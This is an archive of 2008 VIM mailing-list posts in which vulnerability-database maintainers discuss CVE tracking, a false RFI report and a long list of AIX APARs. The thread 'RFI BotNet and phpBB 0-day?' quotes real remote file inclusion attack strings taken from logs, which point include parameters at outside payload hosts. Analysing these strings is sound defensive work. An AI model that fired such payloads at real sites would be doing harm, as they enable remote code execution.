From coley at mitre.org Mon Mar 3 21:55:36 2008 From: coley at mitre.org (Steven M. Christey) Date: Mon, 3 Mar 2008 16:55:36 -0500 (EST) Subject: [VIM] lists.grok.org.uk gone wild Message-ID: <200803032155.m23LtaRv009446@faron.mitre.org> Is it just me, or is lists.grok.org.uk renumbering all its archives in seemingly arbitrary fashion, breaking URLs at every whim? Like, this URL: http://lists.grok.org.uk/pipermail/full-disclosure/2008-January/059985.html used to be for "Livelink UTF-7 XSS Vulnerability" but is now an Ubuntu advisory. and this one: http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060460.html used to be for "Move Networks Quantum Streaming Player" but is now for "Backend Cross Site Scripting (XSS)". - Steve From jericho at attrition.org Mon Mar 3 22:46:20 2008 From: jericho at attrition.org (security curmudgeon) Date: Mon, 3 Mar 2008 22:46:20 +0000 (UTC) Subject: [VIM] lists.grok.org.uk gone wild In-Reply-To: <200803032155.m23LtaRv009446@faron.mitre.org> References: <200803032155.m23LtaRv009446@faron.mitre.org> Message-ID: : Is it just me, or is lists.grok.org.uk renumbering all its archives in : seemingly arbitrary fashion, breaking URLs at every whim? I also ran into a big patch of them that went 404 weeks later. Since then I have been making sure to replace any link with another archive. From ge at linuxbox.org Mon Mar 3 22:50:19 2008 From: ge at linuxbox.org (Gadi Evron) Date: Mon, 3 Mar 2008 16:50:19 -0600 (CST) Subject: [VIM] lists.grok.org.uk gone wild In-Reply-To: References: <200803032155.m23LtaRv009446@faron.mitre.org> Message-ID: On Mon, 3 Mar 2008, security curmudgeon wrote: > > : Is it just me, or is lists.grok.org.uk renumbering all its archives in > : seemingly arbitrary fashion, breaking URLs at every whim? > > I also ran into a big patch of them that went 404 weeks later. Since then > I have been making sure to replace any link with another archive. > Anyone spoke with John? From coley at mitre.org Wed Mar 5 20:55:37 2008 From: coley at mitre.org (Steven M. Christey) Date: Wed, 5 Mar 2008 15:55:37 -0500 (EST) Subject: [VIM] false: 123 Flash Chat RFI Message-ID: <200803052055.m25Ktbcj019388@faron.mitre.org> Researcher: F10 Ref: BUGTRAQ:20080228 123 Flash Chat Module for phpBB URL:http://www.securityfocus.com/archive/1/archive/1/488914/100/0/threaded 123flashchat.php contains: $phpbb_root_path = './'; include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); phpbb_login_chat.php contains: $phpbb_root_path = './'; include($phpbb_root_path . 'extension.inc'); include($phpbb_root_path . 'common.'.$phpEx); extension.inc and common.php are not part of the 123 Flash distribution itself; rather, they're part of phpBB's sessions integration as described at http://www.phpbb.com/kb/article/phpbb2-sessions-integration/ - Steve From coley at linus.mitre.org Wed Mar 5 21:03:11 2008 From: coley at linus.mitre.org (Steven M. Christey) Date: Wed, 5 Mar 2008 16:03:11 -0500 (EST) Subject: [VIM] lists.grok.org.uk gone wild In-Reply-To: References: <200803032155.m23LtaRv009446@faron.mitre.org> Message-ID: On Mon, 3 Mar 2008, Gadi Evron wrote: > > I also ran into a big patch of them that went 404 weeks later. Since then > > I have been making sure to replace any link with another archive. > > Anyone spoke with John? Now that I know it's not just me, I'm sending him an email. - Steve From jkouns at opensecurityfoundation.org Sun Mar 9 03:08:57 2008 From: jkouns at opensecurityfoundation.org (jkouns) Date: Sat, 08 Mar 2008 22:08:57 -0500 Subject: [VIM] netVigilance Security Advisory Message-ID: <47D354C9.3020103@opensecurityfoundation.org> Noticed a couple netVigilance advisories with this in the reference section: http://www.netvigilance.com/advisory0065 External References: Mitre CVE: ID requested but no answer received NVD NIST: ID requested but no answer received OSVDB: ID requested but no answer received From coley at linus.mitre.org Sun Mar 9 23:57:58 2008 From: coley at linus.mitre.org (Steven M. Christey) Date: Sun, 9 Mar 2008 19:57:58 -0400 (EDT) Subject: [VIM] netVigilance Security Advisory In-Reply-To: <47D354C9.3020103@opensecurityfoundation.org> References: <47D354C9.3020103@opensecurityfoundation.org> Message-ID: NVD is irrelevant - they don't have "write access" to CVE data, so they would have to refer researchers to us anyway. In this case, he made a request with only a couple sentences worth of details, but I asked a followup question since I wasn't sure how many CVEs to assign. He answered quickly, but then I dropped the ball. He waited at least a week before releasing. - Steve On Sat, 8 Mar 2008, jkouns wrote: > Noticed a couple netVigilance advisories with this in the reference section: > > http://www.netvigilance.com/advisory0065 > > External References: > Mitre CVE: ID requested but no answer received > NVD NIST: ID requested but no answer received > OSVDB: ID requested but no answer received > > From jericho at attrition.org Wed Mar 12 08:51:58 2008 From: jericho at attrition.org (security curmudgeon) Date: Wed, 12 Mar 2008 08:51:58 +0000 (UTC) Subject: [VIM] CVE-2007-6018 - more information Message-ID: While catching up on Horde / IMP vulns, I noticed this: http://lists.horde.org/archives/announce/2008/000365.html Many thanks to Secunia for reporting an XSS vulnerability (CVE-2007-6018) and working with us to test the fixes. -- The CVE description doesn't mention XSS due to lack of details at time of creation it appears. From jericho at attrition.org Thu Mar 20 10:04:39 2008 From: jericho at attrition.org (security curmudgeon) Date: Thu, 20 Mar 2008 10:04:39 +0000 (UTC) Subject: [VIM] RFI BotNet and phpBB 0-day? Message-ID: For a while i've noticed a ton of RFI requests made to attrition.org, the frequency and patterns suggest it's a large botnet possibly. I haven't had time to really dig into the logs and learn much about it. Tonight I saw one request come across and got curious how many of these requests were published vulnerabilities versus potential 0-day. Many requests don't have enough information to easily determine the software (e.g. /dir/index.php?id=http://), but this may: /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f I don't see reference to "page_tail.php" in CVE or OSVDB. The directory structure suggests it is either in Claroline or phpBB though. http://www.claroline.net/download/stable.html Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file above. http://www.phpbb.com/downloads/ Version 2.0.23 ("legacy") has "page_tail.php" in it. Version 3.0.0 (phpBB3) has no file by that name. -- So, does anyone want to see if it is truly vulnerable? If so, we know it's phpBB 2.0.23 (and maybe prior), we know the file name and variable, and we know it is actively being exploited in the wild and discovered as a result of it. Brian p.s. While writing this, a full example of one that would be a tad harder to track down, but given the "com_comprofiler" and "mosConfig_absolute_path", shouldn't be that difficult: /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f p.p.s. And an example of an older disclosed vulnerability being used: /squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f (CVE-2006-2483 / OSVDB 25523) From theall at tenablesecurity.com Thu Mar 20 13:35:19 2008 From: theall at tenablesecurity.com (George A. Theall) Date: Thu, 20 Mar 2008 09:35:19 -0400 Subject: [VIM] RFI BotNet and phpBB 0-day? In-Reply-To: References: Message-ID: On Mar 20, 2008, at 6:04 AM, security curmudgeon wrote: > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5 back in 2006: http://claroline.svn.sourceforge.net/viewvc/claroline?view=rev&revision=6566 http://claroline.svn.sourceforge.net/viewvc/claroline/branches/1.5/README.txt?revision=6567&view=markup George -- theall at tenablesecurity.com From str0ke at milw0rm.com Thu Mar 20 13:35:28 2008 From: str0ke at milw0rm.com (str0ke) Date: Thu, 20 Mar 2008 08:35:28 -0500 Subject: [VIM] RFI BotNet and phpBB 0-day? In-Reply-To: References: Message-ID: <47E26820.1060405@milw0rm.com> How goes it Brian, If your bored I have a few rfi's for you to go through :) # wc -l todays-rfi-bots.txt 44737 todays-rfi-bots.txt The file will show the number of uniq entries that have hit milw0rm in the past 24 hours requesting http inclusions. People forget to remove milw0rm from their rfi scans. /str0ke security curmudgeon wrote: > > For a while i've noticed a ton of RFI requests made to attrition.org, > the frequency and patterns suggest it's a large botnet possibly. I > haven't had time to really dig into the logs and learn much about it. > Tonight I saw one request come across and got curious how many of > these requests were published vulnerabilities versus potential 0-day. > Many requests don't have enough information to easily determine the > software (e.g. /dir/index.php?id=http://), but this may: > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f > > > I don't see reference to "page_tail.php" in CVE or OSVDB. The > directory structure suggests it is either in Claroline or phpBB though. > > http://www.claroline.net/download/stable.html > > Version 1.8.9 .tar has "page.php" and "pager.lib.php" but not the file > above. > > http://www.phpbb.com/downloads/ > > Version 2.0.23 ("legacy") has "page_tail.php" in it. > > Version 3.0.0 (phpBB3) has no file by that name. > > -- > > So, does anyone want to see if it is truly vulnerable? If so, we know > it's phpBB 2.0.23 (and maybe prior), we know the file name and > variable, and we know it is actively being exploited in the wild and > discovered as a result of it. > > Brian > > > > p.s. While writing this, a full example of one that would be a tad > harder to track down, but given the "com_comprofiler" and > "mosConfig_absolute_path", shouldn't be that difficult: > /index.php?_REQUEST=&_REQUEST%5boption%5d=option,com_comprofiler&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://test15.digitalis.com.pa/components/com_atom/id.txt%3f%3f > > > p.p.s. And an example of an older disclosed vulnerability being used: > /squirrelcart/cart_content.php?cart_isp_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f > > (CVE-2006-2483 / OSVDB 25523) > From coley at linus.mitre.org Thu Mar 20 17:19:36 2008 From: coley at linus.mitre.org (Steven M. Christey) Date: Thu, 20 Mar 2008 13:19:36 -0400 (EDT) Subject: [VIM] RFI BotNet and phpBB 0-day? In-Reply-To: <47E26820.1060405@milw0rm.com> References: <47E26820.1060405@milw0rm.com> Message-ID: I tried to do something similar some time ago, automatically classifying incoming RFI requests based with their CVE, but it was painful and time-consuming and incomplete, for reasons you specified. So yeah, there's probably 0-days in our logs. Dunno if it's a botnet but given Gadi's paper from last year on web server compromises, it's a really good theory. > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f I looked at the 2.0.23 source. Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a /claroline/phpbb/page_tail.php to work. So, this is probably Claroline. phpBB2's page_tail.php in 2.0.23 also has a direct request prevention: if ( !defined('IN_PHPBB') ) { die('Hacking attempt'); } and no mention of includePath. HOWEVER, in Claroline 1.55 (an older version) we have: ./claroline155/claroline/phpbb/page_tail.php But - no apparent luck: @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php"); and no mention of includePath in that file. claro_init_footer.inc.php seems clean. Similar for 1.64. However - $includePath is used all over the place in Claroline, and apparently uses an unset(), so maybe there's a relationship with an unset bug. 1.42 ZIP file seems corrupted, so I couldn't check it out. Apropos to nothing, during my investigations, I found a REALLY efficient way to create a huge file: grep PATTERN `find . -type file` > myfile apparently, my shell creates "myfile" before the find is executed, so grep runs against its own results file. I caught a gig in a matter of seconds :) - Steve From jericho at attrition.org Thu Mar 20 18:12:32 2008 From: jericho at attrition.org (security curmudgeon) Date: Thu, 20 Mar 2008 18:12:32 +0000 (UTC) Subject: [VIM] RFI BotNet and phpBB 0-day? In-Reply-To: <47E26820.1060405@milw0rm.com> References: <47E26820.1060405@milw0rm.com> Message-ID: : If your bored I have a few rfi's for you to go through :) : : # wc -l : todays-rfi-bots.txt : : 44737 todays-rfi-bots.txt : : The file will show the number of uniq entries that have hit milw0rm in : the past 24 hours requesting http inclusions. People forget to remove : milw0rm from their rfi scans. Hah, this is what I was thinking of doing but automating it more to pull them out nightly. If time permitted, I was going to get fancy and have it weed out known vulnerabilities. If not, I wonder if there are a few folks that could check them if we mail them here with a little research already done. Obviously we all want to track vulnerabilities in our respective databases, but these are of specific interest for several reasons. Primarily, they are being actively exploited in the wild and would qualify for 'undercover vulnerabilities' [1]. I'm also curious if these suffer from the 'grep and gripe' false positives that we see on the mail lists, and if the botnet is essentially trying to do inclusions on scripts that aren't really vulnerable in the first place. .b [1] http://osvdb.org/blog/?p=227 From noamr at beyondsecurity.com Thu Mar 20 18:31:23 2008 From: noamr at beyondsecurity.com (Noam Rathaus) Date: Thu, 20 Mar 2008 20:31:23 +0200 Subject: [VIM] RFI BotNet and phpBB 0-day? In-Reply-To: References: <47E26820.1060405@milw0rm.com> Message-ID: <200803202031.23359.noamr@beyondsecurity.com> Hi, I wrote a while ago a perl script that goes through the apache logs and captures anything that looks like an RFI attack. Problem is as you guys mentioned that: 1) Some RFI aren't RFI, they are people that mistype URLs, or double-paste URLs, etc 2) Some RFI attacks are not viable - rather people testing things out ... like you probably try SQL inject any site that has a nice number in the URL :) 3) Some RFI attacks are so automated that they will try to attack you even if you don't have anything installed on your computer If anyone wants this script I can send it over and he can look at the effort I did. (BTW: The perl also sorts and returns unique RFI attacks - in order to minimize the 100k+ RFI our site sees every month) On Thursday 20 March 2008 20:12:32 security curmudgeon wrote: > : If your bored I have a few rfi's for you to go through :) > : > : # wc -l > : todays-rfi-bots.txt > : > : 44737 todays-rfi-bots.txt > : > : The file will show the number of uniq entries that have hit milw0rm in > : the past 24 hours requesting http inclusions. People forget to remove > : milw0rm from their rfi scans. > > Hah, this is what I was thinking of doing but automating it more to pull > them out nightly. If time permitted, I was going to get fancy and have it > weed out known vulnerabilities. If not, I wonder if there are a few folks > that could check them if we mail them here with a little research already > done. > > Obviously we all want to track vulnerabilities in our respective > databases, but these are of specific interest for several reasons. > Primarily, they are being actively exploited in the wild and would qualify > for 'undercover vulnerabilities' [1]. > > I'm also curious if these suffer from the 'grep and gripe' false positives > that we see on the mail lists, and if the botnet is essentially trying to > do inclusions on scripts that aren't really vulnerable in the first place. > > .b > > [1] http://osvdb.org/blog/?p=227 -- Noam Rathaus CTO noamr at beyondsecurity.com http://www.beyondsecurity.com "Know that you are safe." Beyond Security Finalist for the "Red Herring 100 Global" Awards 2007 From jericho at attrition.org Thu Mar 20 19:34:26 2008 From: jericho at attrition.org (security curmudgeon) Date: Thu, 20 Mar 2008 19:34:26 +0000 (UTC) Subject: [VIM] RFI BotNet and phpBB 0-day? In-Reply-To: References: <47E26820.1060405@milw0rm.com> Message-ID: : Dunno if it's a botnet but given Gadi's paper from last year on web : server compromises, it's a really good theory. I say that based on a few things i've seen, and I bet a real analysis would very quickly prove or disprove the theory. : > > /claroline/phpbb/page_tail.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt%3f%3f : : I looked at the 2.0.23 source. : : Using phpBB2 code: page_tail.php is in includes/ - so I wouldn't expect a : /claroline/phpbb/page_tail.php to work. So, this is probably Claroline. Well, don't base it just on that path. I see a LOT of obvious path request screwups: /pipermail/vim/2006-October/001080.html//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://xdengue01.iespana.es/bds/sefe.txt?? I see these a hundred times a day and obviously will not work. So seeing /claroline/ in front of the /phpbb/ request was odd, but I didn't take it to mean it was necessarily claroline, even though it may be. : ./claroline155/claroline/phpbb/page_tail.php : : But - no apparent luck: : : @include(dirname(__FILE__)."/../inc/claro_init_footer.inc.php"); : : and no mention of includePath in that file. : : claro_init_footer.inc.php seems clean. : : Similar for 1.64. : : However - $includePath is used all over the place in Claroline, and : apparently uses an unset(), so maybe there's a relationship with an unset : bug. : : 1.42 ZIP file seems corrupted, so I couldn't check it out. >From George: Looks like an issue in Claroline 1.5.x fixed with the release of 1.5.5 back in 2006: http://claroline.svn.sourceforge.net/viewvc/claroline?view=rev&revision=6566 http://claroline.svn.sourceforge.net/viewvc/claroline/branches/1.5/README.txt?revision=6567&view=markup From jericho at attrition.org Tue Mar 25 07:04:00 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 07:04:00 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX NIS User Password Expiration Telnet Bypass 2007-03-07 http://www-1.ibm.com/support/docview.wss?uid=isg1IY95721 IBM AIX tcp_tcpsecure 2007-03-10 http://www-1.ibm.com/support/docview.wss?uid=isg1IY95881 IBM AIX sisraidmgr / sissasraidmgr Local Overflow 2007-03-16 http://www-1.ibm.com/support/docview.wss?uid=isg1IY96184 IBM AIX lsvirprt Local Overflow 2007-03-20 http://www-1.ibm.com/support/docview.wss?uid=isg1IY96274 IBM AIX isakmpd INITIAL_CONTACT Message Remote DoS 2007-03-29 http://www-1.ibm.com/support/docview.wss?uid=isg1IY96709 IBM AIX bos.net.tcp.server 2007-04-09 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97150 IBM AIX bos.net.nfs.client 2007-04-01 http://www-1.ibm.com/support/docview.wss?uid=isg1IY96834 IBM AIX WLM Class kprocs Association Persistence 2007-04-13 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97359 IBM AIX WLM Class rset Update kprocs Race Condition 2007-04-13 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97360 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97251 IBM AIX devices.common.IBM.ib.rte 2007-04-20 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97679 IBM AIX J2 Log Sync List Corruption 2007-04-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97708 IBM AIX Lock Instrumentation DoS 2007-04-24 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97812 From jericho at attrition.org Tue Mar 25 07:50:59 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 07:50:59 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest (batch 2) Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX devices.chrp.IBM.lhea.rte hea_config() / hea_async_kproc() NULL Dereference DoS 2007-05-02 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98076 IBM AIX v_pdtfreescb 2007-05-02 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98084 IBM AIX cpupstat 2007-05-11 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98482 IBM AIX v_scan_compute_weights 2007-05-11 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98483 IBM AIX DMAPI-enabled Application DoS 2007-05-11 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98485 IBM AIX dbx 2007-05-11 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98510 IBM AIX bos.net.nfs.client unget_context 2007-05-17 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98707 IBM AIX bad_vnode_bad_caller 2007-05-17 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98728 IBM AIX bos.pmapi.pmsvcs accumulate_context() Race Condition DoS 2007-05-17 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98733 From jericho at attrition.org Tue Mar 25 08:55:30 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 08:55:30 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest (batch 3) Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX bos.rte.lvm cplv 2007-05-17 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98765 IBM AIX arl_iodone 2007-05-17 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98766 IBM AIX MultiThreaded Process Race Condition DoS 2007-05-24 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99144 IBM AIX MPIO Disk eRas Functions 2007-05-24 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99159 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98573 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98353 IBM AIX automount map Symlink 2007-06-01 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99438 IBM AIX Sync inode Handling Race Condition DoS 2007-06-07 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99726 IBM AIX j2 Filesystem iActivate() Freed inode Handling DoS 2007-06-07 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99739 IBM AIX eWLM Local CPU Management ewlm_system 2007-06-07 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99749 IBM AIX SIDL Process set_real_rset 2007-06-09 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99819 From jericho at attrition.org Tue Mar 25 09:21:36 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 09:21:36 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest (batch 4) Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX LDAP Username Echo 2007-06-09 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99820 IBM AIX devices.chrp.IBM.lhea.rte Kernel Timer 2007-06-15 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00207 IBM AIX NAMEDSHLIB Export 2007-06-19 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00435 http://www-1.ibm.com/support/docview.wss?uid=isg1IY97325 IBM AIX bos.net.nfs.client Recursive Referral DoS 2007-06-20 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00508 IBM AIX ktimer_delete Double-free 2007-06-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00541 IBM AIX bos.rte.tty TTY Debug CDT Reallocation 2007-06-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00544 IBM AIX devices.pci.14108c00.rte 2007-06-25 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00682 IBM AIX chpasswd non-DES Hashing 2007-06-26 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00748 From jericho at attrition.org Tue Mar 25 18:18:44 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 18:18:44 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest (batch 5) Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX WLM rset 2007-06-26 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00765 IBM AIX tx_complete Ethernet Transmission 2007-06-25 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00772 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00698 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01467 IBM AIX devices.common.IBM.ib.rte ICM QpModifyState() 2007-06-26 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00788 IBM AIX JFS2 Errors 2007-06-30 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ00948 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05847 http://www-1.ibm.com/support/docview.wss?uid=isg1IY99892 IBM AIX eWLM Kernel Process Creation 2007-07-03 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01029 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01414 IBM AIX walk_thread_table() 2007-07-12 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01474 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02281 IBM AIX SNONE 2007-07-12 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01475 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02282 IBM AIX bos.cifs_fs.rte smbfs_smb_lookup 2007-07-19 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01724 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02273 IBM AIX txLock 2007-07-28 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02001 IBM AIX JS22 2007-07-28 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02003 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02287 From jericho at attrition.org Tue Mar 25 18:44:39 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 18:44:39 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest (batch 6) Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX RPC Communication yp_all 2007-08-05 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02536 http://www-1.ibm.com/support/docview.wss?uid=isg1IY98802 IBM AIX bos.net.nfs.client Directory Export 2007-08-05 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02576 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02379 IBM AIX bos.mp64 raschk_safe_read 2007-08-05 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02585 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02526 IBM AIX Multiple Security Commands 2007-08-11 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02838 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01883 IBM AIX devices.common.IBM.fc.rte FC Interface IP Packet DoS 2007-08-11 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ02845 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01628 IBM AIX devices.fcp.disk.rte Virtual Optical Disk 2007-08-20 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03363 IBM AIX Process dbx detach 2007-08-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03438 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03134 IBM AIX bos.mp low._s Offset Overflow 2007-08-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03441 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ03135 IBM AIX vmgetinfo vmpool Request DoS 2007-09-03 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04161 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04393 IBM AIX bos.aixpert.websm Websm 2007-09-09 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04505 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04499 From jericho at attrition.org Tue Mar 25 19:15:20 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 19:15:20 +0000 (UTC) Subject: [VIM] slew of AIX APARs of interest (batch 7) Message-ID: While frolicking through the IBM APAR slag, I ran across a lot of entries that may be vulnerabilities and worthy of inclusion in VDBs. Due to the details being a bit vague, i'm not entirely sure which are vulnerabilities, which can be abused from user land privileges, etc. So, here they are for consideration and discussion. I'm including the URL, date reported and OSVDB-ish titles. IBM AIX bos.acct Accounting Schema Reversion 2007-09-09 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04507 IBM AIX bos.net.tcp.client ICMP ECHO Cross-session Disclosure ? 2007-09-10 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04519 IBM AIX bos.net.ipsec.keymgt isakmpd Phase 2 SA Fail Message DoS 2007-09-14 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04955 IBM AIX WLM Class Addition 2007-09-15 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04960 IBM AIX rmmap Segment Handling 2007-09-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05214 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ01575 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04749 IBM AIX audit_write Function 2007-09-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05218 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05850 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04149 IBM AIX abend_trap 2007-09-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05223 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ04989 IBM AIX _passwdentry_auto Memory Corruption 2007-09-21 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05231 http://www-1.ibm.com/support/docview.wss?uid=isg1IZ05260 From jericho at attrition.org Tue Mar 25 19:22:17 2008 From: jericho at attrition.org (security curmudgeon) Date: Tue, 25 Mar 2008 19:22:17 +0000 (UTC) Subject: [VIM] AIX APAR conclusion - notes and oddities Message-ID: Wow, talk about brain melt. The APAR database, as seen by regular unauthenticated users is a complete mess and full of confusion. I posted a quick blog entry the other day about it: http://osvdb.org/blog/?p=235 First it was HP, then it was Sun. Not to be outdone, IBM steps up and gives VDBs a headache. APAR IZ00988 is sysrouted to APAR IZ01121 and APAR IZ01122. Really IBM, the amount of information common to all three pages is overwhelming. Do you really need a new APAR number issued for component name or level? Cant you just list them all in one APAR and save us time? More importantly, do we need three APAR entries that say a security issue has been fixed and make us dig up the information? When all said and done, there are obviously a lot of issues that MAY have security implications, but it's hard to tell based on the information available. We definitely need an AIX guru or IBM rep to clear them up. I'm not holding my breath. I ran across the following APARs that came back 'Document not found.' The changelog I originally saw them in suggests there are security implications. IZ00829 RMUSER COMMAND REMOVED PASSWD STANZA FROM /ETC/SECURITY/PASSWD IY97793 PASSWDEXPIRED MAY RETURN INCORRECT VALUE IF PASSWD IS CORRUPTED IY96773 FTPD SECURITY ISSUES IN KRB5 ENVIRONMENT IY95914 